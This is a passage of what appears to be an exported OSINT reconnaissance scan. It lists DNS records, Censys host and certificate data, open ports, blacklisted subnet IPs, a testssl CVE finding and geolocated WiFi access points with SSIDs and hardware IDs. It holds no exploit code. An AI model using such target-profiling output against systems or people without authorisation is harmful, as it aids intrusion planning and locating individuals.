"doma-bauunternehmen.de": {"record_type": "A", "resolved_at": "2023-04-21T16:49:29.979118706Z"}, "www.nexonnlabs.com": {"record_type": "CNAME", "resolved_at": "2022-09-30T13:48:19.548808342Z"}, "solmemo.com": {"record_type": "A", "resolved_at": "2022-09-24T14:54:13.477895766Z"}, "incomparable-shortbread-590615.netlify.app": {"record_type": "A", "resolved_at": "2022-10-18T05:23:11.462954637Z"}, "ch-demo.pandia.health": {"record_type": "CNAME", "resolved_at": "2023-05-07T17:30:47.539606427Z"}, "www.gabrielmmelo.online": {"record_type": "CNAME", "resolved_at": "2023-04-24T21:33:23.254848616Z"}, "lrlc.netlify.app": {"record_type": "A", "resolved_at": "2023-03-11T12:07:56.988859902Z"}, "cypress-herman-rice-and-flatley.agency.dev.sweepbright.com": {"record_type": "CNAME", "resolved_at": "2023-04-22T00:39:57.696351195Z"}, "djneill.com": {"record_type": "A", "resolved_at": "2022-10-18T06:14:40.221938027Z"}, "damagestudio.dev": {"record_type": "A", "resolved_at": "2022-10-14T14:43:11.503470454Z"}, "matmicha.fr": {"record_type": "A", "resolved_at": "2023-03-14T00:08:20.262214614Z"}, "www.demokratie-fuer-alle.de": {"record_type": "CNAME", "resolved_at": "2023-05-01T16:02:45.480438463Z"}, "shire-agents.netlify.app": {"record_type": "A", "resolved_at": "2023-02-13T12:05:10.828777395Z"}, "www.stevekennaird.com": {"record_type": "CNAME", "resolved_at": "2023-04-28T16:39:39.961329324Z"}, "www.cookiehive.com": {"record_type": "CNAME", "resolved_at": "2023-03-28T14:25:16.963226501Z"}, "www.venture.app": {"record_type": "CNAME", "resolved_at": "2023-02-19T12:07:23.514163374Z"}, "blog.demiurgemgmt.net": {"record_type": "CNAME", "resolved_at": "2023-03-07T17:42:56.945311068Z"}, "xinxiao.xyz": {"record_type": "CNAME", "resolved_at": "2022-10-18T06:29:56.337111755Z"}, "boutique.moutte-blanc.fr": {"record_type": "CNAME", "resolved_at": "2022-10-02T14:30:13.237914106Z"}, "submojo.com": {"record_type": "A", "resolved_at": "2023-05-02T23:07:06.093849499Z"}, "domeo-conseils.com": {"record_type": "A", "resolved_at": "2022-10-18T05:44:40.794710874Z"}, "support-cal.com": {"record_type": "A", "resolved_at": "2022-10-10T16:20:02.978606819Z"}, "116.48.229.35.bc.googleusercontent.com": {"record_type": "A", "resolved_at": "2023-04-27T15:20:33.707197957Z"}, "www.credible-india.com": {"record_type": "A", "resolved_at": "2023-04-25T14:31:44.370834713Z"}, "for-noobs.online": {"record_type": "A", "resolved_at": "2023-04-04T22:14:33.656533464Z"}, "resultlog.yakim.dev": {"record_type": "CNAME", "resolved_at": "2023-03-20T01:17:43.435999319Z"}, "staging.livecorp.com.au": {"record_type": "CNAME", "resolved_at": "2023-04-18T10:01:38.603411352Z"}, "payroll-billing-group-dev.netlify.com": {"record_type": "A", "resolved_at": "2023-02-17T14:31:45.286191553Z"}, "rhymeswithvirus.com": {"record_type": "A", "resolved_at": "2022-12-02T14:02:42.334196804Z"}, "clinicianvalues.cliniciandevelopmentcollective.com": {"record_type": "CNAME", "resolved_at": "2022-12-17T13:11:02.105813066Z"}, "www.statsjo.com": {"record_type": "CNAME", "resolved_at": "2022-10-18T04:17:17.475596148Z"}, "dsa-play.altaracredit.com": {"record_type": "CNAME", "resolved_at": "2023-04-06T02:52:22.746004121Z"}, "www.mathew-paul.nz": {"record_type": "A", "resolved_at": "2022-09-26T18:24:02.409943161Z"}, "justingrant.net": {"record_type": "A", "resolved_at": "2023-04-24T20:06:17.033788828Z"}, "www.brianbickett.com": {"record_type": "CNAME", "resolved_at": "2023-03-12T13:34:01.218204209Z"}, "galaxies.me": {"record_type": "A", "resolved_at": "2023-04-18T18:10:07.290447904Z"}, "rain.1xgame.one": {"record_type": "CNAME", "resolved_at": "2022-12-04T16:57:26.409530339Z"}, "www.sotaymotsach.com": {"record_type": "CNAME", "resolved_at": "2023-03-22T17:11:42.194873644Z"}, "slint-ui.com": {"record_type": "A", "resolved_at": "2022-10-13T14:26:55.820670540Z"}, "lofty.ga": {"record_type": "A", "resolved_at": "2023-03-08T16:11:09.534895940Z"}, "nostalgic-heisenberg-e4886d.netlify.com": {"record_type": "A", "resolved_at": "2023-02-24T14:18:20.154813627Z"}, "www.therawoutdoors.com": {"record_type": "A", "resolved_at": "2022-10-18T04:24:46.047294270Z"}, "www.zendesk.garden": {"record_type": "CNAME", "resolved_at": "2023-03-28T00:16:02.912201217Z"}, "blog.securecloudops.com": {"record_type": "CNAME", "resolved_at": "2023-04-16T15:43:53.820468269Z"}, "stmargs.atollon.com.au": {"record_type": "CNAME", "resolved_at": "2023-04-29T12:20:31.721712090Z"}, "foreignair.net": {"record_type": "A", "resolved_at": "2023-04-10T20:05:47.472804549Z"}, "merry-queijadas-0f8f4d.netlify.app": {"record_type": "A", "resolved_at": "2023-03-09T20:24:29.112094937Z"}, "ladefogedqualen.dk": {"record_type": "A", "resolved_at": "2022-10-18T04:56:04.736817426Z"}, "www.codewithsoccer.com": {"record_type": "CNAME", "resolved_at": "2022-12-16T13:09:13.792874661Z"}, "www.shorefireconsulting.com": {"record_type": "CNAME", "resolved_at": "2023-03-18T15:11:31.030660555Z"}, "souldata.app": {"record_type": "A", "resolved_at": "2023-02-19T12:07:28.599013285Z"}, "barcelonabeachvolley.com": {"record_type": "A", "resolved_at": "2023-04-04T14:24:11.442622163Z"}, "www.guerraoffice.com": {"record_type": "CNAME", "resolved_at": "2022-10-18T06:23:06.306203975Z"}, "kind2-home.netlify.app": {"record_type": "A", "resolved_at": "2022-11-09T12:04:25.207224093Z"}, "www.advancedliving.com.au": {"record_type": "CNAME", "resolved_at": "2023-03-16T00:18:33.882392422Z"}, "nsql.jinjier.art": {"record_type": "CNAME", "resolved_at": "2023-02-19T12:11:08.181507523Z"}, "deadneighbor.com": {"record_type": "A", "resolved_at": "2023-03-22T10:33:56.952236337Z"}, "ruchit.tk": {"record_type": "A", "resolved_at": "2022-10-18T06:13:12.128806491Z"}, "zacyoungdale.com": {"record_type": "A", "resolved_at": "2022-10-18T05:11:14.822496438Z"}, "terra-viewer.sensehawk.com": {"record_type": "CNAME", "resolved_at": "2023-02-23T14:59:54.839469148Z"}, "cloud.cantoo.co": {"record_type": "CNAME", "resolved_at": "2023-04-11T13:23:47.629232056Z"}, "jeremy.mayeres.be": {"record_type": "CNAME", "resolved_at": "2023-02-19T12:18:54.480921504Z"}, "www.nifi.love": {"record_type": "CNAME", "resolved_at": "2023-04-24T18:42:23.444509655Z"}, "www.k8150.net": {"record_type": "CNAME", "resolved_at": "2023-01-23T20:10:36.824486514Z"}, "api.science.io": {"record_type": "A", "resolved_at": "2023-01-27T15:12:42.987078445Z"}, "www.scottmadethis.net": {"record_type": "CNAME", "resolved_at": "2023-04-16T19:40:39.283102532Z"}, "www.qwed.work": {"record_type": "CNAME", "resolved_at": "2022-12-27T16:50:33.603590310Z"}, "spbalcarcelart.com": {"record_type": "A", "resolved_at": "2023-04-04T16:23:47.949765963Z"}, "iaapassgen.tk": {"record_type": "A", "resolved_at": "2022-10-18T04:12:38.321708790Z"}, "feedback.nuhoc.com": {"record_type": "CNAME", "resolved_at": "2022-10-18T05:08:22.974703827Z"}}, "names": ["damagestudio.dev", "rhymeswithvirus.com", "www.javamate.net", "www.accasionmarquees.co.uk", "cloud.cantoo.co", | 35.229.48.116 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | referrer-policy: strict-origin-when-cross-origin | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "MISS", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"909ebccb4059d7a6690e6424fe1cd04d\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=0Oz6%2FLYR6mlw4qLR9TqycfDZLMo35NVUiZYmytvsw3hnWwlYi3vXylGK8mcPxqptF5Q12B2z9i8IcSssMtY%2F8jZKTAZstXlLXIh5z%2FfUynzRd9ziD3olhhhTaQ1vvaqk6%2BxJd7oSs5Bg\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f60498977c3f0-EWR"} |
| 2023-05-12 02:44:16 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | githubusercontent.com | 185.199.111.153 |
| 2023-05-12 03:23:38 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.14:80 | 188.114.96.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | keisharayne (Net ID: 00:1D:CE:8A:EF:D7) | 32.8608, -79.9746 |
| 2023-05-12 03:00:38 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.38): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:45:49 | Physical Location | No | AbstractAPI | 0 | 0 | 2 | 0 | None | Chicago, Illinois, 60666, United States, North America | 172.67.135.9 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | TATBIKAT MIMARLIK (Net ID: 00:14:C1:20:3F:E3) | 40.2024, 29.0398 |
| 2023-05-12 03:00:28 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | zlib@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T17:34:59.155Z", "ip": "165.232.113.85", "labels": ["remote-access"], "location_updated_at": "2023-05-07T02:12:11.614586Z", "autonomous_system_updated_at": "2023-05-07T02:12:11.614661Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-03-14T04:19:27.651284527Z"}, "donation.ecash-pay.com": {"record_type": "A", "resolved_at": "2023-05-02T14:52:26.416247013Z"}, "ir.unoix.xyz": {"record_type": "A", "resolved_at": "2023-02-24T09:36:05.967059332Z"}, "cw8d1e.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-26T18:13:54.295361033Z"}, "www.donation.ecash-pay.com": {"record_type": "CNAME", "resolved_at": "2023-05-10T14:21:06.212577360Z"}}, "names": ["cw8d1e.easypanel.host", "donation.ecash-pay.com", "ir.unoix.xyz", "kekw.battleb0t.xyz", "www.donation.ecash-pay.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.186", "extended_service_name": "SSH", "observed_at": "2023-05-11T00:26:20.725509381Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "468524f109ad3925211cfe755beb70d9d361e6b16882cdc3a4df2bd7a75ea822", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "qEQb2J/p1gtQSyf7LjYce8VteZ3JO4CSQ9vSfPw9RFI=", "x": "XuSrdLhzIT/D0WARwSsM6RVmszeetwTsDG1sOtrp9H0=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://165.232.113.85/"}, "response": {"body": "<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.18.0 (Ubuntu)</center>\r\n</body>\r\n</html>\r\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "404 Not Found", "protocol": "HTTP/1.1", "body_size": 162, "body_hashes": ["sha256:340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87", "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f"], "status_code": 404, "body_hash": "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f", "headers": {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Server": ["nginx/1.18.0 (Ubuntu)"]}, "html_tags": ["<title>404 Not Found</title>"], "status_reason": "Not Found"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:47993c12bd45511268c274adb000951fc2436ea5a8e968b2b1f7b49fb5b05631"], "source_ip": "167.94.146.57", "extended_service_name": "HTTP", "observed_at": "2023-05-11T09:00:02.235713315Z", "banner_hex": "485454502f312e3120343034204e6f7420466f756e640d0a5365727665723a206e67696e782f312e31382e3020285562756e7475290d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_TELIA", "banner": "HTTP/1.1 404 Not Found\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "version": "1.18.0", "source": "OSI_APPLICATION_LAYER", "other": {"family": "nginx"}, "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:1.18.0:*:*:*:*:*:*:*", "part": "a"}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd", "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"], "chain": [{"issuer_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "subject_dn": "C=US, O=Let's Encrypt, CN=R3", "fingerprint": "67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd"}, {"issuer_dn": "O=Digital Signature Trust Co., CN=DST Root CA X3", "subject_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "fingerprint": "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"}], "leaf_data": {"pubkey_algorithm": "ECDSA", "public_key": {"key_algorithm": "ECDSA", "ecdsa": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "nHw/fXpTPJPh7RXQY/HEObaMVLT3ke0kPIUIN0WUC1w=", "x": "mCLSeRXmhneu3ZkCqqpIEcT5t89qEuMj/T3Pv+htI2M=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}, "fingerprint": "30f014a772b2784f28cc0c8eda057a195b3550629cbebeeea563bf4fba71e48c"}, "subject_dn": "CN=donation.ecash-pay.com", "pubkey_bit_size": 256, "fingerprint": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16", "issuer_dn": "C=US, O=Let's Encrypt, CN=R3", "names": ["donation.ecash-pay.com", "www.donation.ecash-pay.com"], "tbs_fingerprint": "7067e77960f4c789c8e143e4facda20855c120250ec8bfd5b30f06f36bf85662", "subject": {"common_name": ["donation.ecash-pay.com"]}, "signature": {"self_signed": false, "signature_algorithm": "SHA256-RSA"}, "issuer": {"common_name": ["R3"], "organization": ["Let's Encrypt"], "country": ["US"]}}, "leaf_fp_sha_256": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16"}, "cipher_selected": "TLS_CHACHA20_POLY1305_SHA256", "ja3s": "475c9302dc42b2751db9edcac3b74891", "_encoding": {"ja3s": "DISPLAY_HEX"}}, "_encoding": {"banner": "DISPLAY_UTF8", "banne |
| 2023-05-12 03:03:47 | Co-Hosted Site | No | ThreatMiner | 1 | 0 | 2 | 0 | None | ply.gg | 185.199.111.153 |
| 2023-05-12 02:44:43 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | oldfluid.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:34:48:36:b2:51:77:1f:45:f7:ca:23:53:09:6b:f8:20:f7
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 27 01:46:18 2022 GMT
Not After : Mar 27 01:46:17 2023 GMT
Subject: CN=oldfluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:b7:86:7e:22:b8:47:2a:2a:20:fc:69:54:4c:4c:
8d:ea:3f:a1:0c:0e:11:0f:7e:c1:26:df:52:aa:7e:
94:3a:df:e1:4c:c1:e1:54:54:7a:c2:7a:eb:d8:cc:
df:41:19:00:a3:7b:e6:18:3e:51:47:37:04:be:39:
e6:bf:91:38:96:6a:40:69:b8:63:75:51:8c:52:3a:
41:07:8f:c4:ec:e7:d6:72:77:98:6d:17:b7:fd:4c:
4c:0f:1e:e2:38:f3:1e:28:62:8d:25:cc:29:b7:fc:
af:91:3e:9d:e5:92:07:d2:8d:09:ca:64:eb:80:76:
ae:38:a2:33:49:07:84:c8:02:f9:d3:21:2b:ce:01:
78:68:73:b9:2a:22:16:eb:78:90:34:44:73:52:fa:
b4:e5:7a:78:b5:62:9e:70:95:d0:26:0e:c1:b7:b4:
12:fd:9f:10:09:67:d9:3c:f0:82:32:ed:27:d0:55:
a7:30:ce:0b:b7:0a:ef:86:ec:19:5d:c1:a0:11:f8:
d8:f7:da:51:1c:ce:c6:23:90:13:7e:ab:f3:de:c1:
8e:52:9d:26:8b:16:dc:5c:ae:23:f8:3d:43:96:47:
e1:0d:83:73:94:c2:e5:ad:91:ed:93:fe:48:67:3b:
6c:8e:00:5a:b6:2f:0f:94:18:91:b3:ed:bb:bf:d8:
25:d1
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
73:BD:0E:B3:ED:9F:6A:FE:37:97:44:54:03:BB:B6:CC:83:95:C8:48
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:oldfluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
8e:1e:a8:a7:dc:b4:b2:81:77:cc:05:85:bf:5a:da:1d:f4:11:
2f:79:e8:ea:90:50:cd:64:a1:df:43:64:b0:45:83:6a:9e:5d:
59:bc:d7:f8:c2:0e:5f:4b:d2:8c:3b:71:44:77:09:c9:00:b8:
05:73:a8:af:5c:03:95:2d:4c:ab:3f:94:8d:b8:ae:e1:f0:37:
e9:58:9a:a0:2c:5e:da:55:60:52:70:f6:59:b6:b8:74:c2:ec:
81:ab:60:cd:18:64:f8:84:94:8c:df:47:3c:58:34:38:f7:32:
95:4f:6b:ab:3c:d9:c8:9d:74:72:3d:d9:8b:b0:94:26:be:f8:
97:a5:76:6a:24:26:67:96:90:9d:13:49:6a:48:2d:e9:2e:38:
bc:3f:6a:f2:cd:6c:8d:0c:c9:e9:d6:d1:7b:0e:16:58:5f:02:
04:50:48:f9:7c:38:68:3b:60:03:bd:e1:08:78:5b:e8:18:86:
b7:4b:aa:6f:ff:a7:2b:03:04:25:27:96:1f:8f:09:53:64:fa:
5f:9b:e8:88:a7:a7:cf:f6:cb:48:fc:5c:9c:94:c2:c7:76:87:
81:e4:c9:14:d3:20:ef:9f:47:07:5f:b5:8a:d6:96:2d:57:a9:
f9:b6:6d:17:e3:16:11:39:ad:d4:74:7b:49:e0:ca:6b:a7:15:
ef:22:a3:8b
|
| 2023-05-12 03:01:21 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.186): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <hidden ssid> (Net ID: 00:01:E3:54:FF:0B) | 52.3759, 4.8975 |
| 2023-05-12 03:01:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.129): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:09:45 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 134.97.148.34.bc.googleusercontent.com | 34.148.97.134 |
| 2023-05-12 03:01:29 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.28): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | linksys (Net ID: 00:14:BF:A7:74:74) | 32.8608, -79.9746 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:75:F1:53) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 6 | 0 | None | British Indian Ocean Territory | 01def.io |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | warriorforum (Category: hobby)
https://www.warriorforum.com/members/login.html | login |
| 2023-05-12 03:01:24 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.227): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:13 | HTTP Headers | No | Censys | 0 | 0 | 4 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} | 2606:4700:3030::ac43:a8fc |
| 2023-05-12 03:03:27 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 000hen.github.io |
| 2023-05-12 03:01:41 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.192): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Speaker Deck (Category: social)
https://speakerdeck.com/login/ | login |
| 2023-05-12 03:09:32 | Affiliate - Internet Name | No | DNS Resolver | 2 | 0 | 3 | 0 | None | cdn-185-199-108-154.github.com | 185.199.108.154 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | \022\026\024\001\027\004\013\017\005\014\022\032\0 (Net ID: 00:09:5B:2F:26:42) | 39.0469, -77.4903 |
| 2023-05-12 03:12:12 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 2 | 2 | 0 | None | CVE-2011-3389
